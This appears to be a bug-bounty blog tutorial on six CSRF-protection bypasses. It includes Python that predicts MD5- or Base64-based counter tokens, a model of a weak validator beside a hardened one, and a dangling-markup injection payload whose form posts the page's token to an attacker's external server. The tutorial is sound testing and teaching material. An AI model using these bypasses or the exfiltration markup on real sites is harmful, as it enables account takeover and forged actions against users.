1. Using a CSRF token across accounts
The simplest and most damaging CSRF bypass occurs when an application does not check whether the CSRF token belongs to the current user's session and only checks that the token is well formed (that it matches the expected format or generation algorithm). To test for this:
Log in to the application as Account A
Go to its password change page
Capture the CSRF token of the password change request using Burp Proxy
Log out and log in as Account B
Go to the password change page and intercept the request
Replace Account B's CSRF token with the one captured from Account A and forward the request. If the password change succeeds, the token is not bound to the session.
2. Replacing value of the same length
Another technique is to determine the length and character set of the token. For instance, if it is a 32-character alphanumeric token sent in the authenticity_token parameter, replace it with a different 32-character alphanumeric value.
If the token is ud019eh10923213213123, you replace it with another token of the same length and format. An application that only checks the shape of the token, rather than its actual value, will accept it.
3. Removing the CSRF token from requests entirely
This technique typically works on account deletion functions, where the token is not verified at all, which lets an attacker delete any user's account via CSRF. I have found that it can work on other functionality as well. It is simple: intercept the request in Burp Suite and remove the token parameter from it entirely, then confirm that the action actually completed (for example, that the password or account state changed) rather than relying on the HTTP status code alone. Around 40% of the applications I have tested were vulnerable to this technique.
4. Decoding CSRF tokens
Another way to bypass CSRF protection is to identify how the token is generated. In my experience, CSRF tokens are often MD5 hashes or Base64-encoded values. You can decode the captured value, work out the next one, and encode it the same way. For instance, the token “a0a080f42e6f13b3a2df133f073095dd” is MD5(122); you can compute MD5(123) in the same way and use it as the next valid token. Note that a predictable token is only useful if the server also fails to bind it to the session (see technique 1).
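The prediction step described above, as an added example that is not code from the original post: given a captured token, check whether it is the MD5 hash or the Base64 encoding of a simple counter and, if so, produce the next value. The counter assumption and the search limit are mine; the MD5 values are recomputed with hashlib rather than copied from the post.

```python
import base64
import binascii
import hashlib

# Added example (not from the original post): given a captured CSRF token,
# work out whether it is MD5 or Base64 of a simple counter and predict the
# next value. The counter assumption and search limit are assumptions here.

HEX_DIGITS = set("0123456789abcdef")


def md5_hex(value: str) -> str:
    """Hex MD5 of a string, the way a token-as-MD5(counter) scheme would produce it."""
    return hashlib.md5(value.encode()).hexdigest()


def predict_md5_counter_token(token: str, search_limit: int = 100_000):
    """If token == MD5(str(n)) for some n below search_limit, return (n, MD5(str(n + 1))).

    Returns None when the token is not a 32-char hex string or no preimage is found.
    """
    token = token.strip().lower()
    if len(token) != 32 or not set(token) <= HEX_DIGITS:
        return None
    for n in range(search_limit):
        if md5_hex(str(n)) == token:
            return n, md5_hex(str(n + 1))
    return None


def decode_base64_token(token: str):
    """Base64-decode a token (re-adding stripped padding); None if it is not Base64."""
    padded = token + "=" * (-len(token) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def predict_base64_counter_token(token: str):
    """If the token is Base64 of a decimal counter, return (n, Base64(str(n + 1)))."""
    raw = decode_base64_token(token)
    if raw is None or not raw.isdigit():
        return None
    n = int(raw)
    return n, base64.b64encode(str(n + 1).encode()).decode()


if __name__ == "__main__":
    # Constructed input: the token a counter-based scheme would issue for
    # n = 122, standing in for a value captured in Burp.
    captured = md5_hex("122")
    print("captured:", captured, "->", predict_md5_counter_token(captured))
    print("captured: MTIy ->", predict_base64_counter_token("MTIy"))
```

The brute-force loop is cheap because the hypothesis is a small counter; if no preimage turns up within the limit, the token is probably not a hash of a sequential value and the technique does not apply.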
5. Extracting token via HTML injection
This technique uses an HTML injection vulnerability on the page that contains the token: the attacker plants markup that captures the token and delivers it to a server they control (dangling markup injection). For example, an attacker can inject an unclosed form and textarea such as
<form action="http://shahmeeramir.com/acquire_token.php"><textarea>
Because the textarea is never closed, the rest of the page, including the hidden CSRF token field, becomes its content, and when the form is submitted that content is sent to the attacker's server, where the token can be read out and reused.
6. Using only the static parts of the token
It is often observed that a CSRF token is composed of two parts: a static part and a dynamic part. Consider the two CSRF tokens shahmeer742498h989889 and shahmeer7424ashda099s. In many cases, if you submit only the static part of the token, shahmeer7424, the application accepts it, because only that part is actually compared on the server.
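Techniques 1, 2, 3 and 6 all come down to the same server-side mistake: the token is checked for shape, presence or a fixed prefix instead of being compared with the token issued to the current session. The following added example (not code from the original post) models that weak check next to a hardened one and replays each technique against both. STATIC_PART and the authenticity_token parameter name follow the post's examples; the Session class and the 32-hex-character token format are assumptions.

```python
import hmac
import secrets

# Added example (not code from the original post): a small model of the
# server-side check that techniques 1, 2, 3 and 6 defeat, next to a hardened
# version. STATIC_PART and the authenticity_token parameter name follow the
# post's examples; the Session class and token format are assumptions.

STATIC_PART = "shahmeer7424"   # constant prefix shared by every token (technique 6)


class Session:
    """Server-side session: one user, one token generated at login."""

    def __init__(self, user: str):
        self.user = user
        self.csrf_token = secrets.token_hex(16)   # 32 hex characters


def weak_validate(session: Session, form: dict) -> bool:
    """Checks only the token's shape, never its binding to this session."""
    token = form.get("authenticity_token")
    if token is None:
        return True                           # technique 3: absent token is not checked
    if token.startswith(STATIC_PART):
        return True                           # technique 6: only the static part is compared
    # technique 2: any 32-char alphanumeric value passes; technique 1: the value
    # is never compared with session.csrf_token, so another account's token passes too.
    return len(token) == 32 and token.isalnum()


def strict_validate(session: Session, form: dict) -> bool:
    """Token must be present and equal (constant-time) to the one stored in this session."""
    token = form.get("authenticity_token")
    if not isinstance(token, str) or not token.isascii():
        return False
    return hmac.compare_digest(token, session.csrf_token)


def run_bypasses(validate) -> dict:
    """Replay each technique against a validator; True means the forged request was accepted."""
    victim = Session("account_b")      # the session the attacker wants to act in
    attacker = Session("account_a")    # the attacker's own session (technique 1)
    attempts = {
        "1_other_accounts_token": {"authenticity_token": attacker.csrf_token},
        "2_same_length_value":    {"authenticity_token": "a" * 32},
        "3_token_removed":        {},
        "6_static_part_only":     {"authenticity_token": STATIC_PART},
    }
    return {name: validate(victim, form) for name, form in attempts.items()}


def legitimate_request_accepted(validate) -> bool:
    """Sanity check: the session's own token must still be accepted."""
    s = Session("account_b")
    return validate(s, {"authenticity_token": s.csrf_token})


if __name__ == "__main__":
    for name, fn in (("weak", weak_validate), ("strict", strict_validate)):
        print(name, run_bypasses(fn), "own token ok:", legitimate_request_accepted(fn))
```

The hardened check has three properties the weak one lacks: a missing token is a rejection rather than a skipped check, the comparison is against the token stored in this session rather than against a format, and the comparison is constant-time so the token cannot be recovered byte by byte.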
There are many other ways to bypass CSRF protection, but these are the ones I have encountered most often in my bug hunting career. If you know of any others, please mention them in the comments below, and let me know what you would like me to blog about next.